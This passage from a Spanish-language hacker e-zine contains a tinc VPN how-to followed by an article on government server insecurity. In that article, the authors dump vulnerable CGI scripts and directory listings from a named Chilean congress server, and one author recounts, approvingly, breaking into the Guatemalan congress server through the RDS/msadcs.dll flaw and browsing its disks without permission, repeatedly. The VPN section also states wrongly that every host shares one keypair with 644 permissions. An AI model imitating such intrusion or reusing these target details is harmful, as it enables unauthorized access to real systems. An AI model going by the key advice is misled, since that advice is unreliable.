SubNet = 10.1.0.0/16

Esta variable indica la subred que usara esta maquina dentro de la vpn. (En el ejemplo esta maquina
tiene el ip 10.1.52.3 por eso tiene esa subnet, ustedes tendrn que adapta rlo a sus necesidades). Esta
variable puede ser usada 2 veces.

Esto ltimo que vamos a ver es la llave pblica, esta llave pblica tiene un par que es la llave privada.
Crearemos nuestro juego de llaves de la siguiente manera:

~# tincd -n vpn -K

(vpn es el nombre de nuestra red, el nombre que usamos en el ejemplo, ustedes tendrn que poner su
nombre)

Esto nos preguntar a donde queremos guardar nuestra llave pblica primero y luego donde queremos
poner nuestra llave privada. Esta ltima tiene que ser guardada en un archivo.

solo para ella. Bueno una vez generadas nuestras llaves tendremos que ponerlas en su lugar, la publica
la copiamos y la pegamos en el archivo de hosts y la privada la guardamos en /etc/tinc/vpn/ o /
usr/local/etc/tinc/vpn/ si instalamos tinc en /usr/local/. Ntese que tanto la llave publica como la privada
tiene que ser la misma en TODAS las maquinas de la vpn, o sea tendremos que trasladarlas de alguna
manera segura por ejemplo usando scp o un diskette =P.

En total nuestro archivo de host quedara parecido a esto:

Address = 24.232.22.22
Port = 655
SubNet = 10.1.0.0/16
-----BEGIN RSA PUBLIC KEY-----
DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

Existen otras variables que se pueden usar en los archivos de los hosts, esta variables pueden ser
encontradas en el manual oficial del tinc (en ingles):

http://tinc.nl.linux.org/documentation/tinc_4.html#SEC39

3.2 tinc.co nf

Tinc.conf tiene muchas mas variables de las que vamos a mostrar ac, ellas se pueden encontrar en el
manual oficial de tinc (en ingles) que esta aqu:

http://tinc.nl.linux.org/documentation/tinc_4.html#SEC38

Nuestro tinc.conf estar conformado de la siguiente manera:

Name = hostlocal

Esta variable seala el nombre de NUESTRO host, el cual tiene que coincidir con el nombre
de nuestro archivo host que creamos en el paso anterior.

Device = /dev/net/tun

Esta variable seala el nombre de nuestro device, el que creamos en el paso 2.3.

PrivateKeyFile = /etc/tinc/vpn/rsa_key.priv

Esta variable seala el path de nuestra llave privada que creamos en el paso anterior. (La llave
privada tiene que tener 644 de permisos ya que sino, tinc nos dar un error al iniciar diciendo que la
llave privada no es segura).

ConnecTo = otrohost

Esta variable se usara para indicarle al tinc con quien debe intentar conectarse, solo es necesaria en
los clientes. En el ejemplo del final veremos cuando se usa y cuando no.

En total nuestro archivo tinc.conf quedaria mas o menos as:

Name = hostlocal
Device = /dev/net/tun
PrivateKeyFile = /etc/tinc/vpn/rsa_key.priv
ConnecTo = otrohost

Este ltimo se usara solo en caso de los clientes.

4.0 Inician d o tinc y ejemplo final

Bueno una vez que tenemos configurado nuestro tinc podemos arrancarlo de la siguiente manera:

~# tincd -d LEVEL -n vpn

Este comando lleva 2 flags, el primero le indica que inicie en modo debug, as podremos ver con mas
detalle si hay un error en los logs. (tinc loguea con syslog, o sea veremos sus logs mirando el archivo /
var/log/syslog). El segundo flag le indica que red tiene que arrancar, en nuestro caso el nombre era vpn
por eso usamos "-n vpn" ustedes debern usar el nombre de su red. No es necesario arrancar el tinc en
algn orden en especial, se puede arrancar un cliente primero, despus el server y despus otro cliente,
una vez funcionando tinc seguir intenta ndo conectarse al server. Podemos ejecutar ese comando y
verificar que todo funciona bien usando el comando "ifconfig -a" que nos devolver algo as:

vpn Link encap:Ethernet HWaddr FE:FD:00:00:00:00


inet addr:10.1.32.1 Bcast:10.255.255.255 Mask:255.0.0.0
UP BROADCAST RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:18667 errors:0 dropped:0 overruns:0 frame:0
TX packets:19291 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1385552 (1.3 MiB) TX bytes:1590235 (1.5 MiB)

Otros flags tiles pueden ser:

--bypass- security
Este arranca tinc sin que se realice autentificacin o encapsulacion de los paquetes, solo es til para
probar.

Otra cosa necesaria para hacer funcionar nuestra vpn es, una vez arrancado el tinc, levantar la
interfaz virtual, esto se hace como si fuera una interfaz comn (eth0). Para esto vamos a crear un
script en bash que va a ser:

#!/bin/bash
ifconfig vpn hw ether fe:fd:0:0:0:0
ifconfig vpn 10.1.32.1 netmask 255.0.0.0
ifconfig vpn -arp

Copiamos esto lo modificamos y lo guardamos con un nombre tipo "tinc-up" y le damos permisos de
ejecucin, luego lo copiamos a /etc/tinc/vpn/ y listo Cuando arranquemos tinc la interfaz se levantara
automticamente.

4.1 Ejemplo final

Bueno ac vamos a dar el ejemplo de como quedo configurada nuestra vpn. Recordemos que anita va a
hacer de server y Flor y phoenix se conectaran a ella. (Vamos a poner el nombre del archivo y su
contenido, as ven todos los archivos de configuracin usados) .

CONFIGURACION EN ANITA

/etc/tinc/vpn/tinc- up

#!/bin/bash
ifconfig vpn hw ether fe:fd:0:0:0:0
ifconfig vpn 10.1.32.1 netmask 255.0.0.0
ifconfig vpn -arp

---------------------------------

/etc/tinc/vpn/tinc.conf

Name = anita
Device = /dev/net/tun
PrivateKeyFile = /etc/tinc/vpn/rsa_key.priv

---------------------------------

/etc/tinc/vpn/hosts/anita
Address = 24.232.141.211
Port = 655
SubNet = 10.1.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/phoenix

Address = 24.232.174.54
Port = 655
SubNet = 10.2.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/flor

Address = 24.232.11.21
Port = 655
SubNet = 10.3.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

CONFIGURACION EN PHOENIX

/etc/tinc/vpn/tinc- up

#!/bin/bash
ifconfig vpn hw ether fe:fd:0:0:0:0
ifconfig aevpn 10.2.13.1 netmask 255.0.0.0
ifconfig aevpn -arp

---------------------------------

/etc/tinc/vpn/tinc.conf

Name = phoenix
Device = /dev/net/tun
PrivateKeyFile = /etc/tinc/vpn/rsa_key.priv
ConnectTo = anita

---------------------------------

/etc/tinc/vpn/hosts/anita

Address = 24.232.141.211
Port = 655
SubNet = 10.1.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/phoenix

Address = 24.232.174.54
Port = 655
SubNet = 10.2.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/flor
Address = 24.232.11.21
Port = 655
SubNet = 10.3.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------
CONFIGURACION EN FLOR

/etc/tinc/vpn/tinc- up

#!/bin/bash
ifconfig vpn hw ether fe:fd:0:0:0:0
ifconfig aevpn 10.3.23.1 netmask 255.0.0.0
ifconfig aevpn -arp

---------------------------------

/etc/tinc/vpn/tinc.conf

Name = flor
Device = /dev/net/tun
PrivateKeyFile = /etc/tinc/vpn/rsa_key.priv
ConnectTo = anita

---------------------------------

/etc/tinc/vpn/hosts/anita
Address = 24.232.141.211
Port = 655
SubNet = 10.1.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/phoenix

Address = 24.232.174.54
Port = 655
SubNet = 10.2.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

/etc/tinc/vpn/hosts/flor

Address = 24.232.11.21
Port = 655
SubNet = 10.3.0.0/16

-----BEGIN RSA PUBLIC KEY-----


DKSsdWGBAK9UP1FhxT4/RHiB+BBsilOyJku0LE5uDn1kkD6UTx3YY/qWxqMwdddz
mvvN6xLwQxj3DWsqEv46vgj6KoIw/feWREcwSq2v8Vp7iSzmxC8K0QJTDGVTaz
J7QFpXRza8uQqG1LbD9Pfefj+Q376tMn3Fs1lLeeWNu4ljSM/1upnXAgMA//8=
-----END RSA PUBLIC KEY-----

---------------------------------

Bueno vamos a aclarar alguna cosas del ejemplo, primero los ips de internet usados son ficticios (no
traten de conectarse :P), segundo, se deben haber dado cuenta que las mascaras son 255.0.0.0, esto es
porque tienen que ser para toda la red y no solo para el ip de una maquina, otra cosa son los ips,
habrn notado que cada maquina tiene un ip de una subred distinta, esto en nuestro caso personal solo
funciono asi: ponamos 2 maquinas con ips de la misma subred (ejemplo anita = 10.1.1.1 y phoenix =
10.1.1.2) y no logrbamos que las maquinas se vieran, as que solo nos funciono usando un ip de una
subred distinta para cada maquina. Bueno otra cosa es lo que decamos antes de la variable ConnectTo
= anita, habrn notado que esto se usa solo en los clientes, solo flor y phoenix lo tienen, ya que, se
conectan a anita que es el server. Bueno las public y private key tienen que estar en todas las
maquinas y tienen que ser las mismas. Tambin vean que en cada maquina hay un archivo tinc- up que
contiene el script bash que mencionbamos en el punto anterior y que desde ahi se pone el ip que uno
quiera para la maquina, si este archivo se encuentra en /etc/tinc/vpn/ se autoejecuta cada vez que
iniciamos tinc, de lo contrario tendrn que hacerlo a mano.

Con esto terminamos el mini- how-to del tinc, espero que les sirva de algo y recuerden que esto es solo
una versin chiquita y en espaol del manual original, tambin aclaro que no soy ningn gur de las

Redes ni de linux, as que si hay algn error o escrib alguna boludes sepan disculpar, si tienen alguna
duda o algo para aportar o putear o decir, lo que sea, pueden escribirme a: [email protected]
El Lado Oscuro De La Seguridad
Por [EL_CoNaN] & LeOn177
Mail contacto [EL_CoNaN]: conanc d t@hotm ail.com
Mail contact o LeOn177: piso_ [email protected]

Bueno primero que nada, tenemos que dejar las cosas bien claras y decir que este texto o apartado
no es con el fin de producir dao alguno o algn traspi ya sea a empresas, instituciones, gobierno o
etc. Esta seccin naci con la idea de crear conciencia de la seguridad informtica, la importancia de
esta y que mejor que con ejemplos reales y tirando las orejas como se dice, contribuir a crear una
conciencia mas aplicada con lo que respecta a seguridad.

Poco a poco se fue plasmando la idea de esta seccin en la e-zine, con diferentes ideas y estas
mismas llevndolas a ustedes a traves de este medio y que tratamos que se realice de la mejor forma
posible y tenga un nivel de de aceptacin bueno.

Esto empez como un proyecto sin nombre, si no mal recuerdan, en nuestro numero anterior de
nuestra e-zine, precisamente en ( ?????????? Pagina 55 CDT2 ) dimos a conocer, un proyecto,
explicamos a anchas lo que tratara mos, los puntos cuales abarcaramos y hoy estamos aqu dndole
pie y camino a ese proyecto, hoy ya con nombre y apellido, llevamos antes sus ojos el desarrollo de
dicha idea y proyecto.

En nuestra primera intervencin, yo [EL_CoNaN] dar alguna informacin con lo que respecta a el
servidor principal del congreso (http://www.congreso.cl). Estuvimos investigando hace un tiempo y
fijando los ojos en dicho servidor, en el cual se encontraron diversos fallos, algunos muy antiguos y
otros actuales, que hoy por hoy permiten fcilmente el acceso a dicho servidor.

No se pretende ni tampoco es el fin, reitero, no es el fin causar dao, si no el ayudar a ver la seguridad
de sus sistemas, y si tenemos que hoy mostrar informacin, por no obtener una respuesta o el nulo
inters en parchar y desarrollar mejoras en la polticas de seguridad que rigen dichos servidores, sern
tratadas, ac, no importa la institucin, el organismo o la empresa.

Sin mas que decir, creo que esto lo dejamos bien explicado en la edicin anterior, en la pagina 55 de
CDT2. Bueno a continuacin, pasamos a todo.

Primero que nada parto diciendo que la seguridad de los servidores gubernamentales no es de la
mejores con lo que respecta a chile.

Estos seores ocupan muy buenas tecnologas y bsicamente sistemas Unix/Linux y as tambin muy
buenos sistemas de deteccin de intrusos, pero de que sirve tener todo de la mano en tecnologas, si
verdaderamente no la aprovechan y no la la desarrollan como debieran. De que les sirve pararse y
gritar a los cuatro vientos de su seguridad y jactarse de que poco menos sus servidores son
impenetrables. Bueno seores ac empezamos.

[root@cdtboys root]# host www.congreso.cl


www.congreso.cl has address 200.14.67.4

DIR cgi-bin/ 05-Nov-03 16:15 1K


IMG congres.gif 09-Dec-98 12:19 70K
TXT index.html 10-Nov-03 17:25 1K
index.map 16-May- 01 15:50 1K
mapabiblio.map 06-Nov-97 09:34 1K
mapbiblio2.map 22-Aug-97 16:59 1K
mc-icons -
DIR redcn/ 18-Oct-02 22:20 1K

Primero que nada, se debe decir que estas redes tienen ISP dedicado, el cual es bitcom, una empresa
de la V regin, la cual sus servidores dejan mucho que desear.
Bueno haciendo un anlisis a fondo en primera parte de las tecnologas y programas que corran y
hasta el da de hoy corren en el puerto 80, sacamos una infinidad de informacin, tal como esta.

Este es el servidor que corren:


Sunos corriendo un servidor web con Netscape- Enterprise/3.6

Variedad de problemas en script cgi-bin tales como los que pasamos a ver:

/cgi-bin/

DIR Parent Directory

cgi-lib.pl 14-Jan- 99 11:15 2K


get_dialup.pl 14-Jan- 99 10:51 1K
image 26-Jan- 96 12:29 12K
imagemap 26-Jan- 96 16:41 13K
mail/ 26-Jan- 96 12:30 1K
mail2/ 26-Jan- 96 12:30 1K
mipop.cgi 09-Dec-98 15:57 1K
mipoppa 16-Dec-98 12:25 28K
test- cgi 16-Mar- 99 17:49 1K
webmail.pl 04-Apr- 96 12:49 2K
wwwpass 14-Jan- 99 10:51 4K

/cgi-bin/mail/

DIR Parent Directory

aalessan.pl 04-Apr- 96 12:56 2K


acooper.pl 26-Jan- 96 12:30 2K
afrei.pl 26-Jan- 96 12:30 2K
ahorvath.pl 26-Jan- 96 12:30 2K
asule.pl 26-Jan- 96 12:30 2K
azaldiva.pl 26-Jan- 96 12:30 2K
bsiebert.pl 26-Jan- 96 12:30 2K
calderon.pl 26-Jan- 96 12:30 2K
cfrei.pl 26-Jan- 96 12:30 2K
cletelie.pl 26-Jan- 96 12:30 2K
ecantuar.pl 26-Jan- 96 12:30 2K
elarre.pl 26-Jan- 96 12:30 2K
ferrazu.pl 26-Jan- 96 12:30 2K
fprat.pl 26-Jan- 96 12:30 2K
gvaldes.pl 26-Jan- 96 12:30 2K
hamilton.pl 26-Jan- 96 12:30 2K
hlarrain.pl 26-Jan- 96 12:30 2K
iperez.pl 26-Jan- 96 12:30 2K
jgazmuri.pl 26-Jan- 96 12:30 2K
jlagos.pl 26-Jan- 96 12:30 2K
jlavand.pl 26-Jan- 96 12:30 2K
jruiz.pl 26-Jan- 96 12:30 2K
mcarrera.pl 26-Jan- 96 12:30 2K
mmatta.pl 26-Jan- 96 12:30 2K
mol.pl 26-Jan- 96 12:30 2K
mrios.pl 26-Jan- 96 12:30 2K
mruiz.pl 26-Jan- 96 12:30 2K
ndiaz.pl 26-Jan- 96 12:30 2K
ofeliu.pl 26-Jan- 96 12:30 2K
ominami.pl 26-Jan- 96 12:30 2K
rhormaza.pl 26-Jan- 96 12:30 2K
rmacinty.pl 26-Jan- 96 12:30 2K
rmartin.pl 26-Jan- 96 12:30 2K
rmunoz.pl 26-Jan- 96 12:30 2K
rnunez.pl 26-Jan- 96 12:30 2K
sbitar.pl 26-Jan- 96 12:30 2K
sdiez.pl 26-Jan- 96 12:30 2K
sfernand.pl 26-Jan- 96 12:30 2K
sinclair.pl 26-Jan- 96 12:30 2K
spaez.pl 26-Jan- 96 12:30 2K
spinera.pl 26-Jan- 96 12:30 2K
sromero.pl 26-Jan- 96 12:30 2K
thayer.pl 26-Jan- 96 12:30 2K
urenda.pl 26-Jan- 96 12:30 2K
vhuerta.pl 26-Jan- 96 12:30 2K
zaldivar.pl 26-Jan- 96 12:30 2K

/cgi-bin/mail2/

Parent Directory
p 26-Jan- 96 12:30 2K

Aplicamos vista del script

#!/usr/bin/perl -- -*-perl- *-

# ------------------------------------------------------------

# Form- mail.pl, by Reuven M. Lerner (reuven@the- tech.mit.edu).


# This is a rewrite of a program that was trashed by our power
# surge in the middle of February 1994.

# ------------------------------------------------------------

# Bugs and other fixes

# March 1, 1994 (Reuven)


# Fixed security hole that could result from people
# executing subshells
# ------------------------------------------------------------

# Define fairly- constants


$mailprog = '/bin/mail';

#$recipient = 'archive@the- tech.mit.edu';


#$recipient = '[email protected]';
$recipient = '@congreso.cl';

# Print out what we need


print "Content- type: text/html \ n \ n ";
print "<Head><Title>Gracias</Title></Head>";
print "<Body><H1>Gracias por su Email</H1>";

# Get the input


read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

# Split the name- value pairs


@pairs = split(/&/, $buffer);

foreach $pair (@pairs)


{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

# Stop people from using subshells to execute commands


$value =~ s/~!/ ~!/g;

# Uncomment for debugging purposes


# print "Setting $name to $value<P>";

$FORM{$name} = $value;
}

# Now send mail to $recipient

open (MAIL, "|$m ailprog $recipient") | | die "Can't open $mailprog! \ n";
print MAIL "------------------------------------------------------------\ n";
print MAIL "Nombre: $FORM{'nombre'}\n";
print MAIL "Direccion: $FORM{'direccion1'}\n";
print MAIL "Direccion: $FORM{'direccion2'}\n";
print MAIL "Ciudad: $FORM{'ciudad'}\n";
print MAIL "Pais: $FORM{'pais'}\n";
print MAIL "Telefono: $FORM{'telefono'}\n";
print MAIL "Fax: $FORM{'fax'}\n";
print MAIL "E-mail: $FORM{'email'}\n";
print MAIL "Topico o Titulo: $FORM{'topico'}\n";
print MAIL "Texto: $FORM{'comentarios'}\n";
print MAIL "\n- -----------------------------------------------------------\ n";
print MAIL "Remote host: $ENV{'REMOTE_HOST'}\n";
print MAIL "Remote IP address: $ENV{'REMOTE_ADDR'}\n";
close (MAIL);

print "Su email ha sido enviado al Seor Diputado.<br>";


print "<P> <A HREF= \"h t tp://ami.congreso.cl/camara/camara.ht ml \">Volver a Pgina Principal de la
C&aacute;mara de Diputados.<P>";

Un par de script mas xDD...

cat cgi- lib.pl

#! /usr/bin/perl

# Perl Routines to Manipulate CGI input


# [email protected]
# $Header: /home/internet/web/home/cgi-bin/cgi-lib.pl,v 1.2 1994/01/10 15:05:40 seb1005 Exp $
#
# Copyright 1993 Steven E. Brenner
# Unpublished work.
# Permission granted to use and modify this library so long as the
# copyright above is maintained, modifications are documented, and
# credit is given for any use of the library.

# ReadParse
# Reads in GET or POST data, converts it to unescaped text, and puts
# one key=value in each member of the list "@in"
# Also creates key/value pairs in %in, using '\0' to separate multiple
# selections

# If a variable- glob parameter (e.g., *cgi_input) is passed to ReadParse,


# information is stored there, rather than in $in, @in, and %in.

# webcat - cat a file in perl

### $webroot - the root of the web-page tree

$webroot = '/home/internet/web/home/';

sub ReadParse {
if (@_) {
local (*in) = @_;
}

local ($i, $loc, $key, $val);

# Read in text
if ($ENV{'REQUEST_METHOD'} eq "GET") {
$in = $ENV{'QUERY_STRING'};
} elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
for ($i = 0; $i < $ENV{'CONTENT_LENGTH'}; $i++) {
$in .= getc;
}
}

@in = split(/&/,$in);

foreach $i (0 .. $#in) {
# Convert plus's to spaces
$in[$i] =~ s/\+/ /g;

# Convert %XX from hex numbers to alphanumeric


$in[$i] =~ s/%(..)/pack("c",hex($1))/ge;

# Split into key and value.


$loc = index($in[$i],"=");
$key = substr($in[$i],0,$loc);
$val = substr($in[$i],$loc+1);
$in{$key} .= '\0' if (defined($in{$key})); # \0 is the multiple separator
$in{$key} .= $val;
}

$webroot = $ENV{'DOCUMENT_ROOT'};

return 1; # just for fun


}

# PrintHeader
# Returns the magic line which tells WWW that we're an HTML document

sub PrintHeader {
return "Content- type: text/html \ n \ n ";
}

# PrintVariables
# Nicely formats variables in an associative array passed as a parameter
# And returns the HTML string.
sub PrintVariables {
local (%in) = @_;
local ($old, $out);
$old = $*; $* =1;
$output .= "<DL COMPACT>";
foreach $key (sort keys(%in)) {
($out = $in{$key}) =~ s/\ n/<BR>/g;
$output .= "<DT><B>$key</B><DD><i>$out</I><BR>";
}
$output .= "</DL>";
$* = $old;

return $output;
}

# PrintVariablesShort
# Nicely formats variables in an associative array passed as a parameter
# Using one line per pair (unless value is multiline)
# And returns the HTML string.

sub PrintVariablesShort {
local (%in) = @_;
local ($old, $out);
$old = $*; $* =1;
foreach $key (sort keys(%in)) {
if (($out = $in{$key}) =~ s/\n/<BR>/g) {
$output .= "<DL COMPACT><DT><B>$key</B> is <DD><i>$out</I></DL>";
} else {
$output .= "<B>$key</B> is <i>$out</I><BR>";
}
}

$* = $old;

return $output;
}

sub webcat {
local($f) = @_;
open (CAT_IN, $f) | | print "<h1>Script Error:</h1><h2>No such file $f exists.</h2>";
while (<CAT_IN>) { print "$_"; }
close CAT_IN;
}

1; #return true

cat get.di al up.pl

#Get username given IP number

# Check acp_dialup file, which contains IP numbers and usernames for


# users with static IP numbers

open(IN_DIALUP,"/usr/annex/acp_dialup");
while(<IN_DIALUP>) {
if (/^#/) {next;}
if (/$ipadd \ D/) {
($login) = /(^ \w* \ s)/;
chop $login;
last;
}
}
close(IN_DIALUP);

# If we didn't find one there, finger the terminal server to check the
# port for dynamic- IP custimers.

if ($login eq '') {
$host = $ENV{'REMOTE_HOST'};
# if ( ($host =~ s/^port//) && ($host =~ /westnet \ .com$/) ) {
if ( ($host =~ s/^port//) && ($host =~ /congreso \.cl$/) ) {
($port,$ts)=split(/ \./,$host,2);
open (IN_DIALUP,"finger \@$ts |");
while (<IN_DIALUP>) {
if (substr($_,1,2) == $port) {
$login = substr($_,10,8);
$login =~ s/ | \ t //g;
last;
}
}
close IN_DIALUP;
} else {
# Hard- coded names for local hosts.
# These are for internal testing purposes.

if ($port =~ /^vtoc/) {$login = 'fred';}


elsif ($port =~ /^dungeon/) {$login = 'lillian';}
}
}

# If you need to rewrite this routine for you own terminal server, at
# this point $login should contain the login name of the user in
# question.

@info = getpwnam($login);
$i = index($info[6],' ');
$fname = substr($info[6],0,$i);

1;

Este parece ser un mecanismo de identificacin a traves de host o ip de confianza realizado por una
dialup.

A su ves tambin tenemos algunas fallas en el servidor web enterprise propias de instalaciones por
defecto, como escaladas de directorios.

Bueno dejamos a su imaginacin los dems, ya que no es el fin de revelar informacin critica, tal ves
dentro de un tiempo y ende avancemos en nuevas publicaciones lo hagamos, pero esto solo utilizaremos
como medida y tirn de orejas para hacerle ver lo mal que estn.

Bueno sin mas que decir, esperamos que esto no se vuelva a repetir y parchen lo que tengan que
parchar y aseguren lo que tengan que se asegurar. Sin mas los dejo con nuestro colega LeOn177...

Segu n d a parte por: Leon177


Bueno estoy ac para contarles lo fcil que es irrumpir la seguridad de un Server importante, sea
empresa, gobierno, etc...

Esto se debe a que los administr adores no estn debidamente capacitados para su trabajo y a causa de
esto, al verse frente a un ataque a su sistema tienen pocas posibilidades de pararlo, localizar al
atacante y lograr que el sistema no sea vulnerado.

En este artculo contar algo que me paso buscando un sistema para mostrarles el nivel de seguridad
en que se encuentra n estos centros gubernamentales.

El sistema elegido fue: http://www.congreso.gob.gt donde quiero decir al administr ador, que se gano un
premio por tener el sistema con tantas fallas y a su vez la capacidad de respuesta que tiene frente a un
ataque, jeje saludos amigo...

Bien, cabe destacar que en ningn momento se desfiguro el sitio, borro archivos o cualquier cosa, solo
accedimos y miramos que onda.

Primeramente lo que hice es reconocer el terreno, que seria ver que sistema operativo corre, demonios,
puertos, y posibles fallas...

Al hacer esto me encontr que corra un Windows NT 4.0, con esto subieron las posibilidades de
intrusin, tena varios puertos importantes abiertos, y el scan que le hice me dio que tena la posible
falla del RDS (xploit). Voy a contarles en que consiste el BUG del RDS:

El fallo del RDS se logra gracias un .dll el cual es (msadcs.dll) jeje, y como el sistema que corre es un
Windows NT 4.0, es vulnerable, en si esta falla deja que un intruso (en este caso yo), pueda obtener

permisos (SYSTEM).

Como vemos es una falla importante en el sistema lo cual lo deja en manos de cualquiera, y ac
demostra mos la incapacidad del admin...

Bueno ahora encontramos la ruta para acceder al ordenador vctima


http://168.234.108.2/scripts/iisadmin/bdir.htr

Me da lastima el admin, esta falla salio hace tiempo y no tendra que estar circulando. Al encontrar la
ruta acced al disco del Servidor del congreso, me encontr con varios discos, tenia 3 (C:\, D:\ y E:\),
as que tenia un largo trabajo buscando informacin en todo este Server, me encontr directorios con
fotos, pdfs, docs, etc., pens que iba a ser una noche larga, pero para mi desilusin al rato de haber
accedido pumm out, el admin desconecto el ordenador (susto?).

Ahora corra peligro de que el admin arreglara la falla, no tuve otra que esperar a que monte otra vez
el servidor, al otro da pruebo y estaba dentro otra vez, ah se dan cuenta que el administr ador no tiene
idea de como mantener el Server, como ven ya estoy otra vez pero el admin de nuevo desconecta el
ordenador, al no tener tiempo para trabajar en la intrusin deje de lado y esperando que el admin
arregle...

Tiemp o despu s:

Estoy ac despus de un mes de esa ltima intrusin al disco del congreso y por desgracia o felicidad la
falla sigue andando, avise al administrador de lo sucedido y su respuesta fue esta:
No recib respuesta por lo que
Bueno con esto tratado ac, que fue cortito nos damos cuenta que nos enfrentamos a gente sin
capacidad para mantener un Server, nosotros estamos trata ndo de ayudar en la seguridad y es por
esto, que lo tratamos de hacer de la mayor forma posible, para que le tomen el peso a la importancia
que tiene en el mundo de la informatica la seguridad.

Ahora me voy despidiendo y pues saquen sus propias conclusiones sobre los ordenadores
importantes que hay sin seguridad...

Una vez ms hasta la prxima EZINE.


LeOn177

Sin mas que decir, nos despedimos, hasta el prximo numero, donde trata remos a nuestr a manera la
poca seguridad, ya sean de abc entidades o gobierno, siempre y cuando no recojan nuestros anlisis y
no se abran de mente y no le dedican tiempo, personal y mucho presupuesto a la seguridad.

Esto lo volvemos a repetir antes de cerrar esta intervencin en este numero de la E-Zine, esto no lo
hacemos con el afn de desprestigiar a nadie ni tampoco daar, lo hacemos con fines muy claros, que es
mantener alertas a los administradores de dichos sistemas, redes, etc. Algo as como mini grupo de
alertas de seguridad para mantener un poco mas a dicha rama y aportar siempre y cuando podamos
con un grano de arena a que las redes al rededor de nuestros ojos y mentes se mantengan un poco mas
seguras.

Ten cuidado puedes ser el prximo xDD


El amigo Webdav Remote Misconfig
Por Rowter
Mail de contact o: [email protected]

Prefaci o por editor CDT

Buenas seores, hoy dejamos antes sus ojos un excelente texto realizado por nuestro buen amigo
Rowter perteneciente a Vulnfact.

